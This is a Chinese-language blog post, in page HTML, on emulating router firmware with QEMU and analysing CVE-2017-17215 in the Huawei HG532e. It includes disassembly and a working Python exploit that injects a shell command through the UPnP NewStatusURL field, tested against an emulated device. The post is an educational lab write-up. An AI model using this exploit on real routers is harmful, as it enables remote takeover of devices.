<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="基础配置 soln1简单的固件模拟运行使用qemu-user-static进行模拟，下载地址 12https:&#x2F;&#x2F;packages.debian.org&#x2F;bullseye&#x2F;amd64&#x2F;qemu-user-static&#x2F;download#之后执行 sudo dpkg -i xx 就行  在解压的目录中执行，获得qemu 12345678910cp $(whereis qemu-mipsel-stat">
<meta property="og:type" content="article">
<meta property="og:title" content="Iot_Game_Level1：环境配置与命令注入初试">
<meta property="og:url" content="http://example.com/2023/06/04/Iot-Game-Level1/index.html">
<meta property="og:site_name" content="Osaa&#39;s blog">
<meta property="og:description" content="基础配置 soln1简单的固件模拟运行使用qemu-user-static进行模拟，下载地址 12https:&#x2F;&#x2F;packages.debian.org&#x2F;bullseye&#x2F;amd64&#x2F;qemu-user-static&#x2F;download#之后执行 sudo dpkg -i xx 就行  在解压的目录中执行，获得qemu 12345678910cp $(whereis qemu-mipsel-stat">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2023-06-04T04:58:02.000Z">
<meta property="article:modified_time" content="2023-09-12T13:02:48.487Z">
<meta property="article:author" content="Osaa">
<meta property="article:tag" content="iot">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="http://example.com/2023/06/04/Iot-Game-Level1/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

  <title>Iot_Game_Level1：环境配置与命令注入初试 | Osaa's blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Osaa's blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a>

  </li>
        <li class="menu-item menu-item-friends">

    <a href="/schedule/" rel="section"><i class="fa fa-calendar fa-fw"></i>Friends</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="http://example.com/2023/06/04/Iot-Game-Level1/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/image/cat.png">
      <meta itemprop="name" content="Osaa">
      <meta itemprop="description" content="Try to do something interesting">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Osaa's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Iot_Game_Level1：环境配置与命令注入初试
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2023-06-04 12:58:02" itemprop="dateCreated datePublished" datetime="2023-06-04T12:58:02+08:00">2023-06-04</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2023-09-12 21:02:48" itemprop="dateModified" datetime="2023-09-12T21:02:48+08:00">2023-09-12</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="基础配置-soln1"><a href="#基础配置-soln1" class="headerlink" title="基础配置 soln1"></a>基础配置 soln1</h1><p>简单的固件模拟运行使用qemu-user-static进行模拟，下载地址</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">https://packages.debian.org/bullseye/amd64/qemu-user-static/download</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">之后执行 sudo dpkg -i xx 就行</span> </span><br></pre></td></tr></table></figure>
<p>在解压的目录中执行，获得qemu</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">cp $(whereis qemu-mipsel-static) . #针对小端序路由器</span><br><span class="line">cp $(whereis qemu-mips-static) . #针对大端序路由器</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">之后想要对想要模拟的部分固件服务，例如：</span></span><br><span class="line">sudo chroot . ./qemu-mips-static -0 &quot;ssdpcgi&quot; -E HTTP_ST=ssdp:all ./htdocs/cgibin</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">该例子是启动大端序路由器cgibin服务终端ssdpcgi分支，</span></span><br><span class="line"><span class="meta prompt_"> #</span><span class="language-bash">-0 参数意思是第一个参数即是cgibin的main函数中的第一个参数，用于进入服务</span></span><br><span class="line"><span class="meta prompt_"> #</span><span class="language-bash">-E 参数意思是设置环境</span></span><br><span class="line"><span class="meta prompt_"> #</span><span class="language-bash">如果指令出现问题，检查执行的固件服务的格式</span></span><br><span class="line"><span class="meta prompt_"> # </span><span class="language-bash">  file 一个可执行文件即可</span></span><br><span class="line"><span class="meta prompt_"> #</span><span class="language-bash">还有一种可能为qemu版本过低，按照网上的说法为2.4版本以上才行</span></span><br></pre></td></tr></table></figure>
<span id="more"></span>

<h1 id="基础配置-soln2"><a href="#基础配置-soln2" class="headerlink" title="基础配置 soln2"></a>基础配置 soln2</h1><p>如果想直接模拟路由器这个环境，可以利用qemu-system-mips进行模拟，但是我在网上搜了一遍以后发现好像只能模拟小端序的路由器：），下列为初始化脚本init.sh，注意ip，用户名与密码都是root</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">#</span><span class="language-bash">!/bin/sh</span> </span><br><span class="line">sudo brctl addbr virbr0</span><br><span class="line">sudo ifconfig virbr0 192.168.109.1/24 up</span><br><span class="line">sudo tunctl -t tap0</span><br><span class="line">sudo ifconfig tap0 192.168.109.11/24 up</span><br><span class="line">sudo brctl addif virbr0 tap0</span><br><span class="line">sudo qemu-system-mips -M malta -kernel vmlinux-2.6.32-5-4kc-malta -hda debian_squeeze_mips_standard.qcow2 -append &quot;root=/dev/sda1 console=tty0&quot;  -netdev tap,id=tapnet,ifname=tap0,script=no -device rtl8139,netdev=tapnet </span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">-endian big似乎在新版本无法模拟大端序</span></span><br></pre></td></tr></table></figure>

<p>进入我们qemu启动的路由器终端以后，对qemu进行网桥配置，保证路由器可以ping通电脑</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">ifconfig eth0 192.168.109.145/24</span><br><span class="line"></span><br><span class="line">scp -r ./cpio-root  root@192.168.109.145:/root/</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">在电脑中利用ssh连接传输模拟的文件系统</span></span><br><span class="line">chroot ./cpio-root /bin/bash</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">更改bash终端，之后启动服务就行</span></span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">需要关闭网卡配置的话在终端，ifconfig查看网卡以后，就可以查看</span></span><br><span class="line">ifconfig 网卡名 down</span><br></pre></td></tr></table></figure>
<p>但是这个方法太折磨了，还是买个路由器吧：（</p>
<h1 id="CVE-2017-17215-HG532e-远程命令执行漏洞分析"><a href="#CVE-2017-17215-HG532e-远程命令执行漏洞分析" class="headerlink" title="CVE-2017-17215 HG532e 远程命令执行漏洞分析"></a>CVE-2017-17215 HG532e 远程命令执行漏洞分析</h1><h2 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h2><p>根据公布的漏洞信息，发现字符串ctrlt、DeviceUpgrade_1、NewStatusURL，在root目录下进行搜索</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">osaa@ubuntu:~/Desktop/ubin/cveHG/_HG532eV100R001C01B020_upgrade_packet.bin.extracted/squashfs-root$ grep -r &#x27;ctrlt&#x27;</span><br><span class="line">Binary file bin/upnp matches</span><br><span class="line">osaa@ubuntu:~/Desktop/ubin/cveHG/_HG532eV100R001C01B020_upgrade_packet.bin.extracted/squashfs-root$ grep -r &#x27;37215&#x27;</span><br><span class="line">Binary file bin/mic matches</span><br></pre></td></tr></table></figure>
<p>之后再 <code>cat mic</code>  看到了app start pid 之类的字样，因该是个服务端口在37215，且端口号只在37215中，之后再看看upnp的代码，这段代码可以看到注入点在<code>NewStatusURL</code>而他在snprintf之后会用第一个参数a0继续执行system。</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line">LOAD:<span class="number">004074</span>C4 <span class="number">3</span>C <span class="number">05</span> <span class="number">00</span> <span class="number">41</span> <span class="number">24</span> A5 <span class="number">4</span>C <span class="number">40</span>       li      $a1, aNewdownloadurl             # <span class="string">&quot;NewDownloadURL&quot;</span></span><br><span class="line">LOAD:<span class="number">004074</span>CC <span class="number">00</span> <span class="number">00</span> <span class="number">30</span> <span class="number">21</span>                   move    $a2, $zero</span><br><span class="line">LOAD:<span class="number">004074</span>D0 <span class="number">03</span> <span class="number">20</span> F8 <span class="number">09</span>                   jalr    $t9 ; ATP_XML_GetChildNodeByName</span><br><span class="line">LOAD:<span class="number">004074</span>D4 <span class="number">27</span> A7 <span class="number">00</span> <span class="number">20</span>                   addiu   $a3, $sp, <span class="number">0x20</span>  # <span class="string">&#x27; &#x27;</span></span><br><span class="line">LOAD:<span class="number">004074</span>D4</span><br><span class="line">LOAD:<span class="number">004074</span>D8 <span class="number">8F</span> BC <span class="number">00</span> <span class="number">18</span>                   lw      $gp, <span class="number">0x18</span>($sp)</span><br><span class="line">LOAD:<span class="number">004074</span>DC <span class="number">14</span> <span class="number">40</span> <span class="number">00</span> <span class="number">21</span>                   bnez    $v0, loc_407564</span><br><span class="line">LOAD:<span class="number">004074E0</span> <span class="number">00</span> <span class="number">40</span> <span class="number">88</span> <span class="number">21</span>                   move    $s1, $v0</span><br><span class="line">LOAD:<span class="number">004074E0</span></span><br><span class="line">LOAD:<span class="number">004074E4</span> <span class="number">8F</span> A2 <span class="number">00</span> <span class="number">20</span>                   lw      $v0, <span class="number">0x20</span>($sp)</span><br><span class="line">LOAD:<span class="number">004074E8</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span>                   nop</span><br><span class="line">LOAD:<span class="number">004074</span>EC <span class="number">10</span> <span class="number">40</span> <span class="number">00</span> <span class="number">1</span>D                   beqz    $v0, loc_407564</span><br><span class="line">LOAD:<span class="number">004074F</span>0 <span class="number">3</span>C <span class="number">05</span> <span class="number">00</span> <span class="number">41</span>                   lui     $a1, <span class="number">0x41</span>  # <span class="string">&#x27;A&#x27;</span></span><br><span class="line">LOAD:<span class="number">004074F</span>0</span><br><span class="line">LOAD:<span class="number">004074F</span>4 <span class="number">8F</span> <span class="number">99</span> <span class="number">80</span> F4                   la      $t9, ATP_XML_GetChildNodeByName</span><br><span class="line">LOAD:<span class="number">004074F</span>8 <span class="number">8</span>E <span class="number">04</span> <span class="number">00</span> <span class="number">2</span>C                   lw      $a0, <span class="number">0x2C</span>($s0)</span><br><span class="line">LOAD:<span class="number">004074F</span>C <span class="number">24</span> A5 <span class="number">4</span>C <span class="number">50</span>                   li      $a1, aNewstatusurl               # <span class="string">&quot;NewStatusURL&quot;</span></span><br><span class="line">LOAD:<span class="number">00407500</span> <span class="number">00</span> <span class="number">00</span> <span class="number">30</span> <span class="number">21</span>                   move    $a2, $zero</span><br><span class="line">LOAD:<span class="number">00407504</span> <span class="number">03</span> <span class="number">20</span> F8 <span class="number">09</span>                   jalr    $t9 ; ATP_XML_GetChildNodeByName</span><br><span class="line">LOAD:<span class="number">00407508</span> <span class="number">27</span> A7 <span class="number">00</span> <span class="number">24</span>                   addiu   $a3, $sp, <span class="number">0x24</span>  # <span class="string">&#x27;$&#x27;</span></span><br><span class="line">LOAD:<span class="number">00407508</span></span><br><span class="line">LOAD:<span class="number">0040750</span>C <span class="number">8F</span> BC <span class="number">00</span> <span class="number">18</span>                   lw      $gp, <span class="number">0x18</span>($sp)</span><br><span class="line">LOAD:<span class="number">00407510</span> <span class="number">14</span> <span class="number">40</span> <span class="number">00</span> <span class="number">14</span>                   bnez    $v0, loc_407564</span><br><span class="line">LOAD:<span class="number">00407514</span> <span class="number">00</span> <span class="number">40</span> <span class="number">88</span> <span class="number">21</span>                   move    $s1, $v0</span><br><span class="line">LOAD:<span class="number">00407514</span></span><br><span class="line">LOAD:<span class="number">00407518</span> <span class="number">8F</span> A2 <span class="number">00</span> <span class="number">24</span>                   lw      $v0, <span class="number">0x24</span>($sp)</span><br><span class="line">LOAD:<span class="number">0040751</span>C <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span>                   nop</span><br><span class="line">LOAD:<span class="number">00407520</span> <span class="number">10</span> <span class="number">40</span> <span class="number">00</span> <span class="number">10</span>                   beqz    $v0, loc_407564</span><br><span class="line">LOAD:<span class="number">00407524</span> <span class="number">27</span> B0 <span class="number">00</span> <span class="number">28</span>                   addiu   $s0, $sp, <span class="number">0x28</span>  # <span class="string">&#x27;(&#x27;</span></span><br><span class="line">LOAD:<span class="number">00407524</span></span><br><span class="line">LOAD:<span class="number">00407528</span> <span class="number">8F</span> <span class="number">99</span> <span class="number">82</span> <span class="number">84</span>                   la      $t9, snprintf</span><br><span class="line">LOAD:<span class="number">0040752</span>C <span class="number">8F</span> A7 <span class="number">00</span> <span class="number">20</span>                   lw      $a3, <span class="number">0x20</span>($sp)</span><br><span class="line">LOAD:<span class="number">00407530</span> <span class="number">3</span>C <span class="number">06</span> <span class="number">00</span> <span class="number">41</span> <span class="number">24</span> C6 <span class="number">4</span>C <span class="number">60</span>       li      $a2, aUpgGUST1Firmwa             # <span class="string">&quot;upg -g -U %s -t &#x27;1 Firmware Upgrade Ima&quot;</span>...</span><br><span class="line">LOAD:<span class="number">00407538</span> <span class="number">02</span> <span class="number">00</span> <span class="number">20</span> <span class="number">21</span>                   move    $a0, $s0</span><br><span class="line">LOAD:<span class="number">0040753</span>C <span class="number">24</span> <span class="number">05</span> <span class="number">04</span> <span class="number">00</span>                   li      $a1, <span class="number">0x400</span></span><br><span class="line">LOAD:<span class="number">00407540</span> <span class="number">03</span> <span class="number">20</span> F8 <span class="number">09</span>                   jalr    $t9 ; snprintf</span><br><span class="line">LOAD:<span class="number">00407544</span> AF A2 <span class="number">00</span> <span class="number">10</span>                   sw      $v0, <span class="number">0x10</span>($sp)</span><br><span class="line">LOAD:<span class="number">00407544</span></span><br><span class="line">LOAD:<span class="number">00407548</span> <span class="number">8F</span> BC <span class="number">00</span> <span class="number">18</span>                   lw      $gp, <span class="number">0x18</span>($sp)</span><br><span class="line">LOAD:<span class="number">0040754</span>C <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span>                   nop</span><br><span class="line">LOAD:<span class="number">00407550</span> <span class="number">8F</span> <span class="number">99</span> <span class="number">83</span> <span class="number">34</span>                   la      $t9, system</span><br><span class="line">LOAD:<span class="number">00407554</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span>                   nop</span><br><span class="line">LOAD:<span class="number">00407558</span> <span class="number">03</span> <span class="number">20</span> F8 <span class="number">09</span>                   jalr    $t9 ; system</span><br></pre></td></tr></table></figure>

<h2 id="固件模拟"><a href="#固件模拟" class="headerlink" title="固件模拟"></a>固件模拟</h2><p>固件获取参考：<a target="_blank" rel="noopener" href="https://www.freebuf.com/vuls/160040.html">https://www.freebuf.com/vuls/160040.html</a><br>模拟步骤为：<br>1.参考soln2使用init.sh启动一个qemu终端<br>2.之后再用ssh启动一个终端 <code>ssh root@192.168.109.145</code><br>3.cd到bin目录启动upnp 和 mic服务，注意一个点&#x2F;bin&#x2F;bash可能会启动不了，直接在cpio-root目录里面<code>chroot . sh</code>（麻麻地，给整麻了这个）即可<br>4.再在qemu的终端 <code>lsof -i:37215</code>查看服务是否<br>5.这里由于我们ssh启动终端后开启了upnp服务路由器的eth0网卡会变，需要重新配置一次<br>    ifconfig eth0 192.168.109.145&#x2F;24（这个折磨了我太久了，绷不住了）<br>6.保险起见可以再输入指令<code>nc -vv 192.168.109.145 37215 查看端口是否开启 7.之后就可以正常模拟执行打入exp，脚本和终端见下文。 </code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests </span><br><span class="line">headers = &#123;</span><br><span class="line">    <span class="string">&quot;Authorization&quot;</span>: <span class="string">&quot;Digest username=dslf-config, realm=HuaweiHomeGateway, nonce=88645cefb1f9ede0e336e3569d75ee30, uri=/ctrlt/DeviceUpgrade_1, response=3612f843a42db38f48f59d2a3597e19c, algorithm=MD5, qop=auth, nc=00000001, cnonce=248d1a2560100669&quot;</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">data = <span class="string">&#x27;&#x27;&#x27;&lt;?xml version=&quot;1.0&quot; ?&gt;</span></span><br><span class="line"><span class="string"> &lt;s:Envelope xmlns:s=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot; s:encodingStyle=&quot;http://schemas.xmlsoap.org/soap/encoding/&quot;&gt;</span></span><br><span class="line"><span class="string">  &lt;s:Body&gt;&lt;u:Upgrade xmlns:u=&quot;urn:schemas-upnp-org:service:WANPPPConnection:1&quot;&gt;</span></span><br><span class="line"><span class="string">   &lt;NewStatusURL&gt;;mkdir /Osaa_first;&lt;/NewStatusURL&gt;</span></span><br><span class="line"><span class="string">   &lt;NewDownloadURL&gt;HUAWEIUPNP&lt;/NewDownloadURL&gt;</span></span><br><span class="line"><span class="string">  &lt;/u:Upgrade&gt;</span></span><br><span class="line"><span class="string"> &lt;/s:Body&gt;</span></span><br><span class="line"><span class="string">&lt;/s:Envelope&gt;</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line">requests.post(<span class="string">&#x27;http://192.168.109.145:37215/ctrlt/DeviceUpgrade_1&#x27;</span>,headers=headers,data=data)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;finish!!!&quot;</span>)</span><br></pre></td></tr></table></figure>

<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">root@debian-mips:~/squashfs-root# ls</span><br><span class="line">bin  dev  etc  init  lib  mnt  Osaa_first  proc  sbin  tmp  usr  var</span><br><span class="line">root@debian-mips:~/squashfs-root# </span><br></pre></td></tr></table></figure>
<h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><p>个人感觉，对于IOT的漏洞挖掘，就初级阶段感觉是字符串拼接达到system来进行，几个比较初级的cve也都是如此，如何深入了解还得思考一下漏洞挖掘的思路才行，下一篇尝试一下boofuzz的挖掘思路。（挖个坑嘿嘿嘿）</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/iot/" rel="tag"># iot</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2023/05/23/TinyHttp%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90/" rel="prev" title="TinyHttp源码分析">
      <i class="fa fa-chevron-left"></i> TinyHttp源码分析
    </a></div>
      <div class="post-nav-item">
    <a href="/2023/08/04/Unnormal/" rel="next" title="非正常人类真实观察日记">
      非正常人类真实观察日记 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%9F%BA%E7%A1%80%E9%85%8D%E7%BD%AE-soln1"><span class="nav-number">1.</span> <span class="nav-text">基础配置 soln1</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%9F%BA%E7%A1%80%E9%85%8D%E7%BD%AE-soln2"><span class="nav-number">2.</span> <span class="nav-text">基础配置 soln2</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#CVE-2017-17215-HG532e-%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90"><span class="nav-number">3.</span> <span class="nav-text">CVE-2017-17215 HG532e 远程命令执行漏洞分析</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90"><span class="nav-number">3.1.</span> <span class="nav-text">漏洞分析</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%9B%BA%E4%BB%B6%E6%A8%A1%E6%8B%9F"><span class="nav-number">3.2.</span> <span class="nav-text">固件模拟</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%80%BB%E7%BB%93"><span class="nav-number">4.</span> <span class="nav-text">总结</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Osaa"
      src="/image/cat.png">
  <p class="site-author-name" itemprop="name">Osaa</p>
  <div class="site-description" itemprop="description">Try to do something interesting</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">14</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/sohaah" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;sohaah" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://qm.qq.com/q/rwESyZgdUI" title="QQ → https:&#x2F;&#x2F;qm.qq.com&#x2F;q&#x2F;rwESyZgdUI" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>QQ</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Osaa</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
